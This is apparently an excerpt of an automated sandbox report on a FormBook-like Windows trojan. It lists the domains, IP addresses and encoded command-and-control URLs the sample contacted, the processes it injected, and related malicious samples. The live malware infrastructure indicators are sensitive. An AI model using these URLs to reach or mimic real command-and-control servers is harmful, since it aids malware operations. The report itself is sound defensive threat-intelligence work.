http://www.housew.website/4pih/	0%	Avira URL Cloud	safe
http://www.beythome.online/80gy/?40G=aoPUcaSQDoEYl3Li+4Czyu/3g+fbTJot1NLErCBtTlAsQjsNV1cN7WJnCGjlbK4CrVmsUH1zx16cR6YNnzS2sPuaP2IeA1YIjk+zZLMvVudzffalj3pTsEAkrCqDu4c/9ECDd62vUbZW&I6=x8CX	0%	Avira URL Cloud	safe
http://www.beythome.online/80gy/	0%	Avira URL Cloud	safe
http://www.sankan-fukushi.info/21k5/	0%	Avira URL Cloud	safe
http://www.callyur.shop/hayl/	0%	Avira URL Cloud	safe
http://www.questmatch.pro/ipd6/?40G=MAf2oATgQW2BddVfADsXf+wCIFqkr7SFGuPP0SlPqjR1OOKK8KBvL1kFaoovUHshjlod7xBKsGH7WboeoPfL5tpttEQTjebBZLDP1C5B1+B2izjL5y+kFvtZcDEbY8V81qhugw9f9kl5&I6=x8CX	0%	Avira URL Cloud	safe
http://www.madhf.tech/vpqb/?40G=idKeckLAh2QIGB9KZJIRJS/oZMGdTwW1FjmI9FLM0wQU5zssjU3Tb8uAKfYmb7Pqyu/Q	0%	Avira URL Cloud	safe
http://www.conansog.shop/m7wz/?40G=k3rxT2/5CoW37253fqeJ2GQ6srVb5CIz6HeAuhy5mTu7sK1SIq+qIwOPP+2nE63N1XqW2uYy0GjlFOwlbRaUhItXSR0DNFdPvSJbxiH35Vlkry1kHcbP6o4IkfKAx2mWTolkC1NZH4oP&I6=x8CX	0%	Avira URL Cloud	safe
http://www.madhf.tech/vpqb/?40G=idKeckLAh2QIGB9KZJIRJS/oZMGdTwW1FjmI9FLM0wQU5zssjU3Tb8uAKfYmb7Pqyu/QfIKYZQgeFcPlwIuov6UF8iHhIIfztFuddsJZKZ0jfG27BsUoTTDkyVdJYgiWFcO05IwORcvR&I6=x8CX	0%	Avira URL Cloud	safe
http://www.nuy25c9t.sbs/lmj1/	0%	Avira URL Cloud	safe
http://www.nuy25c9t.sbs/lmj1/?40G=JytxcoExloxtM9GYw/YkVBPtQn8SsYRrRxOyYElJ8zmzZDKm1RUtP4/aN3HHeJpfiiM3EsU/TmM7ebohnljNLh6aJBXcpKJnc7knxQojZ5lwIpUW+gGYnH9DbcZ+0LQDmlqLzGDTRmoL&I6=x8CX	0%	Avira URL Cloud	safe
https://static.minne.com/files/banner/minne_600x500	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
www.aziziyeescortg.xyz	104.21.16.1	true	false	high
www.optimismbank.xyz	13.248.169.48	true	false	high
www.madhf.tech	103.224.182.242	true	false	high
tempatmudisini06.click	103.21.221.4	true	true	unknown
www.housew.website	203.161.46.205	true	true	unknown
b1-3-r111.kunlundns.top	101.32.205.61	true	false	high
natroredirect.natrocdn.com	85.159.66.93	true	false	high
www.a1shop.shop	13.248.169.48	true	true	unknown
callyur.shop	66.29.137.10	true	true	unknown
www.aiactor.xyz	13.248.169.48	true	true	unknown
www.questmatch.pro	188.114.96.3	true	false	high
www.conansog.shop	104.21.41.74	true	false	high
www.nonpressure.beauty	104.21.4.93	true	true	unknown
www.sitioseguro.blog	172.67.162.39	true	false	high
www.sankan-fukushi.info	163.44.185.183	true	false	high
www.grandesofertas.fun	unknown	unknown	false	unknown
www.callyur.shop	unknown	unknown	false	unknown
www.beythome.online	unknown	unknown	false	unknown
www.nuy25c9t.sbs	unknown	unknown	false	unknown
www.tempatmudisini06.click	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.tempatmudisini06.click/0kli/	true	Avira URL Cloud: safe	unknown
http://www.optimismbank.xyz/lnyv/	true	Avira URL Cloud: safe	unknown
http://www.conansog.shop/m7wz/	true	Avira URL Cloud: safe	unknown
http://www.callyur.shop/hayl/?40G=7uA1bLkCaR9ampYb6jJSXGsXTCFtFEKjMbBrHkb2OaN+7KcXsqyJMoKLTM78+R5XhUdg+bLytXUVrFAv0hUdKQFF042Tw+6VIfe83rRo/9u22lJBgGdg0kCVzRF/7zaQBZrR0t81edm/&I6=x8CX	true	Avira URL Cloud: safe	unknown
http://www.tempatmudisini06.click/0kli/?40G=Fegsvl+OGDJHKeUkviVqrWXmfitRVJjJzbj1DgnmRmeFZ5KITSJ35O+CNkAnveOy+X8wGwFlf4nSYcZPMr6/ALB9HdTqqkiH2QBnBPtm52OUHeYVRkXu0orA8o5vf7k6+C2EbfsSUCNF&I6=x8CX	true	Avira URL Cloud: safe	unknown
http://www.aiactor.xyz/g2y0/	true	Avira URL Cloud: safe	unknown
http://www.questmatch.pro/ipd6/	true	Avira URL Cloud: safe	unknown
http://www.madhf.tech/vpqb/	true	Avira URL Cloud: safe	unknown
http://www.sankan-fukushi.info/21k5/?I6=x8CX&40G=fWbmkZjyrmfBp888CcG5P/tv6YAygrCJWn0G2JrBW+aKnevZKbpm6U1ITTXCtKXlDFd/bcpJLIqCcWUwrjM1A4LwPHwyvUagu3NR6s+1WMK3FQ8gyne1SqlHaV7MI3WrY5r02MQ5JkbW	true	Avira URL Cloud: safe	unknown
http://www.sitioseguro.blog/arvb/	true	Avira URL Cloud: safe	unknown
http://www.a1shop.shop/0krx/	true	Avira URL Cloud: safe	unknown
http://www.aziziyeescortg.xyz/wbcb/?40G=RE7vYLyK5TU4QOP5rF5bzHvmkOBzPkLWFqcdQsIlKut3OUPHwC3RgbbGtWJhBdiGOnYKFKB5mJuPEPmtM8O0K3O6A/B6pmA5xGmAOUvp0kuEyHznIJjgzI6sNmSk1vDMl2v3exemO24i&I6=x8CX	true	Avira URL Cloud: safe	unknown
http://www.sitioseguro.blog/arvb/?40G=ZBQQqxbud8SVIvMkbBf/fVH1me8478TvMeRY2MiH3kRRc/z7OAWaNoWdi819/s5bJQ0i5xulgwkm2DEXU68//ud7VMWFkg8aHFm5yBkuyjZoE2tjqm34JPZ+m3kLgGiOEtHU69tbM0ur&I6=x8CX	true	Avira URL Cloud: safe	unknown
http://www.aiactor.xyz/g2y0/?I6=x8CX&40G=4J2ZucS0gmHveCLTumStwhEohSgzPPJ4W7Cx1bvPckMEbjsLQyn2mnrwN7XguYk0KfYRNkJmpBfqbfzPpDbCYFRZeOP0GfhrQZRrSAbT+Kmv6/SRHMYq+Ac5wEC2ErfnaeU3KKMi595E	true	Avira URL Cloud: safe	unknown
http://www.housew.website/4pih/?40G=ZmPwAj1McUpIZiz0LuViOUq+B7yzDKheiuLx3j/o2iG3zDrxD498zlZSm94ILhpOzlwyZVIuLGPVSJZjqSUFLMq4/O2h+I/bDxqzy5zs+juv0ihYqY4w6XKkyY2pbw+VQr1Zt9gsO1Gc&I6=x8CX	true	Avira URL Cloud: safe	unknown
http://www.a1shop.shop/0krx/?40G=1C2HTrEVNWyxr52SoGOxlLLcvsNBoexmdy9Nu7HdX9lR7swAMLn31GhWzX/WtioZiLgkIr1TIYTpQv4lfQ4TwOSNsfSyMlf4rPNeG2/89f69I6MEwndXqV58tlctS1+W0a+BwgVQz/Ju&I6=x8CX	true	Avira URL Cloud: safe	unknown
http://www.beythome.online/80gy/?40G=aoPUcaSQDoEYl3Li+4Czyu/3g+fbTJot1NLErCBtTlAsQjsNV1cN7WJnCGjlbK4CrVmsUH1zx16cR6YNnzS2sPuaP2IeA1YIjk+zZLMvVudzffalj3pTsEAkrCqDu4c/9ECDd62vUbZW&I6=x8CX	true	Avira URL Cloud: safe	unknown
http://www.housew.website/4pih/	true	Avira URL Cloud: safe	unknown
http://www.beythome.online/80gy/	true	Avira URL Cloud: safe	unknown
http://www.sankan-fukushi.info/21k5/	true	Avira URL Cloud: safe	unknown
http://www.questmatch.pro/ipd6/?40G=MAf2oATgQW2BddVfADsXf+wCIFqkr7SFGuPP0SlPqjR1OOKK8KBvL1kFaoovUHshjlod7xBKsGH7WboeoPfL5tpttEQTjebBZLDP1C5B1+B2izjL5y+kFvtZcDEbY8V81qhugw9f9kl5&I6=x8CX	true	Avira URL Cloud: safe	unknown
http://www.callyur.shop/hayl/	true	Avira URL Cloud: safe	unknown
http://www.conansog.shop/m7wz/?40G=k3rxT2/5CoW37253fqeJ2GQ6srVb5CIz6HeAuhy5mTu7sK1SIq+qIwOPP+2nE63N1XqW2uYy0GjlFOwlbRaUhItXSR0DNFdPvSJbxiH35Vlkry1kHcbP6o4IkfKAx2mWTolkC1NZH4oP&I6=x8CX	true	Avira URL Cloud: safe	unknown
http://www.madhf.tech/vpqb/?40G=idKeckLAh2QIGB9KZJIRJS/oZMGdTwW1FjmI9FLM0wQU5zssjU3Tb8uAKfYmb7Pqyu/QfIKYZQgeFcPlwIuov6UF8iHhIIfztFuddsJZKZ0jfG27BsUoTTDkyVdJYgiWFcO05IwORcvR&I6=x8CX	true	Avira URL Cloud: safe	unknown
http://www.nuy25c9t.sbs/lmj1/	true	Avira URL Cloud: safe	unknown
http://www.nuy25c9t.sbs/lmj1/?40G=JytxcoExloxtM9GYw/YkVBPtQn8SsYRrRxOyYElJ8zmzZDKm1RUtP4/aN3HHeJpfiiM3EsU/TmM7ebohnljNLh6aJBXcpKJnc7knxQojZ5lwIpUW+gGYnH9DbcZ+0LQDmlqLzGDTRmoL&I6=x8CX	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	rasautou.exe, 0000000B.00000002.3722263586.000000000770E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.lolipop.jp/hc/ja/articles/360049132953	rasautou.exe, 0000000B.00000002.3720366813.0000000005138000.00000004.10000000.00040000.00000000.sdmp, NkMjNSuuRDBHuZ.exe, 0000000D.00000002.3719949020.00000000035A8000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	rasautou.exe, 0000000B.00000002.3722263586.000000000770E000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.litespeedtech.com/error-page	rasautou.exe, 0000000B.00000002.3720366813.0000000004E14000.00000004.10000000.00040000.00000000.sdmp, NkMjNSuuRDBHuZ.exe, 0000000D.00000002.3719949020.0000000003284000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000F.00000002.1730647534.000000002E4C4000.00000004.80000000.00040000.00000000.sdmp	false		high
http://www.sitioseguro.blog	NkMjNSuuRDBHuZ.exe, 0000000D.00000002.3721503493.000000000532C000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	rasautou.exe, 0000000B.00000002.3722263586.000000000770E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://minne.com/?utm_source=lolipop&utm_medium=banner&utm_campaign=synergy&utm_content=404	rasautou.exe, 0000000B.00000002.3720366813.0000000005138000.00000004.10000000.00040000.00000000.sdmp, NkMjNSuuRDBHuZ.exe, 0000000D.00000002.3719949020.00000000035A8000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	rasautou.exe, 0000000B.00000002.3722263586.000000000770E000.00000004.00000020.00020000.00000000.sdmp	false		high
http://assets.lolipop.jp/img/bnr/bnr_lolipop_ad_001.gif	rasautou.exe, 0000000B.00000002.3720366813.0000000005138000.00000004.10000000.00040000.00000000.sdmp, NkMjNSuuRDBHuZ.exe, 0000000D.00000002.3719949020.00000000035A8000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://lolipop.jp/	rasautou.exe, 0000000B.00000002.3720366813.0000000005138000.00000004.10000000.00040000.00000000.sdmp, NkMjNSuuRDBHuZ.exe, 0000000D.00000002.3719949020.00000000035A8000.00000004.00000001.00040000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	rasautou.exe, 0000000B.00000002.3722263586.000000000770E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://pepabo.com/	rasautou.exe, 0000000B.00000002.3720366813.0000000005138000.00000004.10000000.00040000.00000000.sdmp, NkMjNSuuRDBHuZ.exe, 0000000D.00000002.3719949020.00000000035A8000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	rasautou.exe, 0000000B.00000002.3722263586.000000000770E000.00000004.00000020.00020000.00000000.sdmp	false		high
http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refer	rasautou.exe, 0000000B.00000002.3720366813.0000000005912000.00000004.10000000.00040000.00000000.sdmp, NkMjNSuuRDBHuZ.exe, 0000000D.00000002.3719949020.0000000003D82000.00000004.00000001.00040000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	rasautou.exe, 0000000B.00000002.3722263586.000000000770E000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.madhf.tech/vpqb/?40G=idKeckLAh2QIGB9KZJIRJS/oZMGdTwW1FjmI9FLM0wQU5zssjU3Tb8uAKfYmb7Pqyu/Q	NkMjNSuuRDBHuZ.exe, 0000000D.00000002.3719949020.0000000004238000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css	rasautou.exe, 0000000B.00000002.3720366813.0000000005AA4000.00000004.10000000.00040000.00000000.sdmp, NkMjNSuuRDBHuZ.exe, 0000000D.00000002.3719949020.0000000003F14000.00000004.00000001.00040000.00000000.sdmp	false		high
http://js.ad-stir.com/js/adstir.js?20130527	rasautou.exe, 0000000B.00000002.3720366813.0000000005138000.00000004.10000000.00040000.00000000.sdmp, NkMjNSuuRDBHuZ.exe, 0000000D.00000002.3719949020.00000000035A8000.00000004.00000001.00040000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	rasautou.exe, 0000000B.00000002.3722263586.000000000770E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://static.minne.com/files/banner/minne_600x500	rasautou.exe, 0000000B.00000002.3720366813.0000000005138000.00000004.10000000.00040000.00000000.sdmp, NkMjNSuuRDBHuZ.exe, 0000000D.00000002.3719949020.00000000035A8000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
103.21.221.4	tempatmudisini06.click	unknown	9905	LINKNET-ID-APLinknetASNID	true
104.21.16.1	www.aziziyeescortg.xyz	United States	13335	CLOUDFLARENETUS	false
13.248.169.48	www.optimismbank.xyz	United States	16509	AMAZON-02US	false
101.32.205.61	b1-3-r111.kunlundns.top	China	132203	TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN	false
163.44.185.183	www.sankan-fukushi.info	Japan	7506	INTERQGMOInternetIncJP	false
188.114.96.3	www.questmatch.pro	European Union	13335	CLOUDFLARENETUS	false
103.224.182.242	www.madhf.tech	Australia	133618	TRELLIAN-AS-APTrellianPtyLimitedAU	false
203.161.46.205	www.housew.website	Malaysia	45899	VNPT-AS-VNVNPTCorpVN	true
172.67.162.39	www.sitioseguro.blog	United States	13335	CLOUDFLARENETUS	false
85.159.66.93	natroredirect.natrocdn.com	Turkey	34619	CIZGITR	false
104.21.41.74	www.conansog.shop	United States	13335	CLOUDFLARENETUS	false
66.29.137.10	callyur.shop	United States	19538	ADVANTAGECOMUS	true

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1589098
Start date and time:	2025-01-11 09:32:11 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 11m 22s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	18
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	HN1GiQ5tF7.exe renamed because original name is a hash value
Original Sample Name:	c7cb9d1be13c4c8d5e6c1a2bb6f185f08fcc9f8c86eb5c11e3ef62f8b2ebaf2c.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/3@16/12
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 95% Number of executed functions: 49 Number of non-executed functions: 299
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 13.107.246.45, 172.202.163.200
Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target NkMjNSuuRDBHuZ.exe, PID 7000 because it is empty
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing disassembly code.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
04:53:32	API Interceptor	10942589x Sleep call for process: rasautou.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
103.21.221.4	bIcqeSVPW6.exe	Get hash	malicious	FormBook	Browse	www.tempatmudisini06.click/l03t/
	ZcshRk2lgh.exe	Get hash	malicious	FormBook	Browse	www.tempatmudisini06.click/4iun/
	BcF3o0Egke.exe	Get hash	malicious	FormBook	Browse	www.tempatmudisini06.click/4iun/
	rPaymentAdviceNote_pdf.exe	Get hash	malicious	FormBook	Browse	www.tempatmudisini06.click/0kli/
	file.exe	Get hash	malicious	FormBook	Browse	www.tempatmudisini06.click/4iun/
	SWIFT COPY 0028_pdf.exe	Get hash	malicious	FormBook	Browse	www.tempatmudisini06.click/0kli/
	FOTO#U011eRAFLAR.exe	Get hash	malicious	FormBook	Browse	www.tempatmudisini06.click/kfzf/
	Z6s208B9QX.exe	Get hash	malicious	FormBook	Browse	www.tempatmudisini01.click/abla/
	-pdf.bat.exe	Get hash	malicious	FormBook	Browse	www.tempatmudisini01.click/iydt/
	UMOWA_PD.BAT.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.tempatmudisini01.click/iydt/
104.21.16.1	8L6MBxaJ2m.exe	Get hash	malicious	FormBook	Browse	www.rafconstrutora.online/0xli/
	NFhRxwbegd.exe	Get hash	malicious	FormBook	Browse	www.kkpmoneysocial.top/86am/
	JNKHlxGvw4.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	188387cm.n9shteam.in/videolinePipeHttplowProcessorgamelocalTemp.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.aziziyeescortg.xyz	BalphRTkPS.exe	Get hash	malicious	FormBook	Browse	104.21.32.1
	NFhRxwbegd.exe	Get hash	malicious	FormBook	Browse	104.21.80.1
	ORDER - 401.exe	Get hash	malicious	FormBook	Browse	104.21.77.71
	rPaymentAdviceNote_pdf.exe	Get hash	malicious	FormBook	Browse	104.21.77.71
	SWIFT COPY 0028_pdf.exe	Get hash	malicious	FormBook	Browse	188.114.96.3
www.optimismbank.xyz	02Eh1ah35H.exe	Get hash	malicious	FormBook, GuLoader	Browse	76.223.54.146
	suBpo1g13Q.exe	Get hash	malicious	FormBook	Browse	13.248.169.48
	Document_084462.scr.exe	Get hash	malicious	FormBook, GuLoader	Browse	13.248.169.48
	Proforma invoice - Arancia NZ.exe	Get hash	malicious	FormBook	Browse	13.248.169.48
	PAYROLL LIST.exe	Get hash	malicious	FormBook	Browse	13.248.169.48
	SWIFT COPY 0028_pdf.exe	Get hash	malicious	FormBook	Browse	13.248.169.48
www.madhf.tech	qbSIgCrCgw.exe	Get hash	malicious	FormBook	Browse	103.224.182.242
	02Eh1ah35H.exe	Get hash	malicious	FormBook, GuLoader	Browse	103.224.182.242
	suBpo1g13Q.exe	Get hash	malicious	FormBook	Browse	103.224.182.242
	AxKxwW9WGa.exe	Get hash	malicious	FormBook	Browse	103.224.182.242
	tfWjjV1LdT.exe	Get hash	malicious	FormBook	Browse	103.224.182.242
	M7XS5C07kV.exe	Get hash	malicious	FormBook	Browse	103.224.182.242
	PO2412010.exe	Get hash	malicious	FormBook	Browse	103.224.182.242
	Document_084462.scr.exe	Get hash	malicious	FormBook, GuLoader	Browse	103.224.182.242
	New Purchase Order.exe	Get hash	malicious	FormBook	Browse	103.224.182.242
	Purchase Order..exe	Get hash	malicious	FormBook	Browse	103.224.182.242

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	qbSIgCrCgw.exe	Get hash	malicious	FormBook	Browse	172.67.186.192
	4kN17cL4Tn.exe	Get hash	malicious	LummaC	Browse	104.21.76.57
	kAsh3nmsgs.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.13.205
	5tmmrpv3dn.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.16.1
	bIcqeSVPW6.exe	Get hash	malicious	FormBook	Browse	104.21.38.192
	mnXS9meqtB.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.16.1
	xaqnaB0rcW.exe	Get hash	malicious	FormBook	Browse	104.21.54.126
	8L6MBxaJ2m.exe	Get hash	malicious	FormBook	Browse	188.114.97.3
	aS39AS7b0P.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.112.1
	gGI2gVBI0f.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.64.1
LINKNET-ID-APLinknetASNID	bIcqeSVPW6.exe	Get hash	malicious	FormBook	Browse	103.21.221.4
	z6tNjJC614.exe	Get hash	malicious	FormBook	Browse	103.21.221.87
	ZcshRk2lgh.exe	Get hash	malicious	FormBook	Browse	103.21.221.4
	BcF3o0Egke.exe	Get hash	malicious	FormBook	Browse	103.21.221.4
	aBEh0fsi2c.exe	Get hash	malicious	FormBook	Browse	103.21.221.87
	sora.mpsl.elf	Get hash	malicious	Unknown	Browse	139.10.29.3
	arm4.elf	Get hash	malicious	Mirai	Browse	139.44.142.78
	momo.arm7.elf	Get hash	malicious	Mirai	Browse	139.41.98.162
	armv5l.elf	Get hash	malicious	Mirai	Browse	139.34.88.220
	DEMONS.ppc.elf	Get hash	malicious	Unknown	Browse	139.16.152.234
AMAZON-02US	qbSIgCrCgw.exe	Get hash	malicious	FormBook	Browse	13.248.169.48
	8L6MBxaJ2m.exe	Get hash	malicious	FormBook	Browse	13.248.169.48
	6.elf	Get hash	malicious	Unknown	Browse	54.122.159.233
	SH4.elf	Get hash	malicious	Unknown	Browse	54.171.230.55
	3.elf	Get hash	malicious	Unknown	Browse	13.214.70.119
	z6tNjJC614.exe	Get hash	malicious	FormBook	Browse	13.248.169.48
	5.elf	Get hash	malicious	Unknown	Browse	44.238.49.226
	rACq8Eaix6.exe	Get hash	malicious	FormBook	Browse	13.248.169.48
	ty1nyFUMlo.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	3.130.71.34
	plZuPtZoTk.exe	Get hash	malicious	FormBook	Browse	54.67.87.110
TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN	xaqnaB0rcW.exe	Get hash	malicious	FormBook	Browse	101.32.205.61
	YKzxWyqI6Y.exe	Get hash	malicious	FormBook	Browse	101.32.205.61
	02Eh1ah35H.exe	Get hash	malicious	FormBook, GuLoader	Browse	101.35.209.183
	suBpo1g13Q.exe	Get hash	malicious	FormBook	Browse	101.35.209.183
	https://atpscan.global.hornetsecurity.com/?d=W3rdHn1Og9hhUJnVJzqWF36wMmxswAZldvtx3E21ybg&f=v8m9AqGfgV2Ri7cjqmfsuyl2V2Mu_lVW0BRsqcFw4upagWAQ1C-MqANvN6gf4zNV&i=&k=xREg&m=b_ORYMkPffImCXbCPli-aiR7Ga6rGe55sar2xtigCL4MrowDPSzt7ABKETTGxzegakAfoZ57KD02aVix8V8TVmZ2VcxzjeybXYrPiS2SB73LCKYktj5jv2aw6VcPRslz&n=s4crRkyHC4bab6S3yrgn1E3n-VmdqgfSqNiaCJyPrf6hnyL_SE4PHEo5SUcwwsFGV6rnB35iQFM5FLsE91obvZ0HTAEiqHnB8ROLzY5JVgg&r=oMs_cp4DXIjeQhcPWsPLyR3_oxBVUN4Iok_tSVE4DNNtzqeot7ZzvdXkh4vatwpC&s=bd82eb507a358fd35f72f18b86e67f3bfc1ce64bbeab0c01d700897b1b678efb&u=https%3A%2F%2Fe.trustifi.com%2F%23%2Ffff2af%2F32054d%2F67960f%2Fee6fed%2F5d1d11%2F46c760%2Ff79190%2Fc5ec40%2Fe8666a%2Fef542d%2F85972d%2F627493%2F9a11d6%2F1f4096%2F1d247f%2F818e78%2Fc53383%2Fd59aa0%2Fedfa57%2F7914c7%2Fc38cf6%2Ff74f56%2Ff45915%2F39dbbd%2Ff48710%2F1ddf22%2F37d5f2%2F9de9f7%2F96109e%2F882355%2F854b66%2F9d606d%2F2d0447%2Fad3b01%2F637d1c%2F3c0f2b%2F606f48%2Fa6d904%2F8fefe3%2F00a4bb%2F6520c6%2F9b795c%2Fb7de1a%2Fb5dde6%2F3f5692%2F997c7d%2Fc00925%2F782cce%2F511459%2Fab5aa8%2F91722a%2Feec933%2F3f4f91%2F894088%2F43adfa%2Fb78195%2F0407d0%2F56f022%2Fddf20e%2F946567%2Faa271a%2F507b7a%2Faccd06%2F50d63c%2F485c4b%2F07ced8%2Fd0ec21%2F260ce6%2Fb5edbb%2F79a81e%2F1fd160%2Ff4da41%2F7073e0%2F8a5e9a%2Fdac829%2F521e52%2Fa1a847%2F13ea63%2Fabb5a3%2Fe1901e%2Fd876f6%2F7b0bf4%2Fbd19df%2F89bdcd%2F1874d8%2F0fb7f3%2F72f438%2Fa098c5%2F4e2214%2F4b6e54%2F0c4a8f	Get hash	malicious	HTMLPhisher	Browse	170.106.97.195
	https://atpscan.global.hornetsecurity.com/?d=W3rdHn1Og9hhUJnVJzqWF36wMmxswAZldvtx3E21ybg&f=v8m9AqGfgV2Ri7cjqmfsuyl2V2Mu_lVW0BRsqcFw4upagWAQ1C-MqANvN6gf4zNV&i=&k=xREg&m=b_ORYMkPffImCXbCPli-aiR7Ga6rGe55sar2xtigCL4MrowDPSzt7ABKETTGxzegakAfoZ57KD02aVix8V8TVmZ2VcxzjeybXYrPiS2SB73LCKYktj5jv2aw6VcPRslz&n=s4crRkyHC4bab6S3yrgn1E3n-VmdqgfSqNiaCJyPrf6hnyL_SE4PHEo5SUcwwsFGV6rnB35iQFM5FLsE91obvZ0HTAEiqHnB8ROLzY5JVgg&r=oMs_cp4DXIjeQhcPWsPLyR3_oxBVUN4Iok_tSVE4DNNtzqeot7ZzvdXkh4vatwpC&s=bd82eb507a358fd35f72f18b86e67f3bfc1ce64bbeab0c01d700897b1b678efb&u=https%3A%2F%2Fe.trustifi.com%2F%23%2Ffff2af%2F32054d%2F67960f%2Fee6fed%2F5d1d11%2F46c760%2Ff79190%2Fc5ec40%2Fe8666a%2Fef542d%2F85972d%2F627493%2F9a11d6%2F1f4096%2F1d247f%2F818e78%2Fc53383%2Fd59aa0%2Fedfa57%2F7914c7%2Fc38cf6%2Ff74f56%2Ff45915%2F39dbbd%2Ff48710%2F1ddf22%2F37d5f2%2F9de9f7%2F96109e%2F882355%2F854b66%2F9d606d%2F2d0447%2Fad3b01%2F637d1c%2F3c0f2b%2F606f48%2Fa6d904%2F8fefe3%2F00a4bb%2F6520c6%2F9b795c%2Fb7de1a%2Fb5dde6%2F3f5692%2F997c7d%2Fc00925%2F782cce%2F511459%2Fab5aa8%2F91722a%2Feec933%2F3f4f91%2F894088%2F43adfa%2Fb78195%2F0407d0%2F56f022%2Fddf20e%2F946567%2Faa271a%2F507b7a%2Faccd06%2F50d63c%2F485c4b%2F07ced8%2Fd0ec21%2F260ce6%2Fb5edbb%2F79a81e%2F1fd160%2Ff4da41%2F7073e0%2F8a5e9a%2Fdac829%2F521e52%2Fa1a847%2F13ea63%2Fabb5a3%2Fe1901e%2Fd876f6%2F7b0bf4%2Fbd19df%2F89bdcd%2F1874d8%2F0fb7f3%2F72f438%2Fa098c5%2F4e2214%2F4b6e54%2F0c4a8f	Get hash	malicious	HTMLPhisher	Browse	170.106.97.196
	ofZiNLLKZU.exe	Get hash	malicious	FormBook	Browse	101.32.205.61
	https://app.whirr.co/p/cm4711if90205nv0h2e4l0imu	Get hash	malicious	Unknown	Browse	170.106.97.195
	ReIayMSG__polarisrx.com_#7107380109.htm	Get hash	malicious	HTMLPhisher	Browse	119.28.146.206
	ReIayMSG__polarisrx.com_#6577807268.htm	Get hash	malicious	HTMLPhisher	Browse	119.28.147.117

Process:	C:\Windows\SysWOW64\rasautou.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category:	modified
Size (bytes):	196608
Entropy (8bit):	1.1215420383712111
Encrypted:	false
SSDEEP:	384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
MD5:	9A809AD8B1FDDA60760BB6253358A1DB
SHA1:	D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
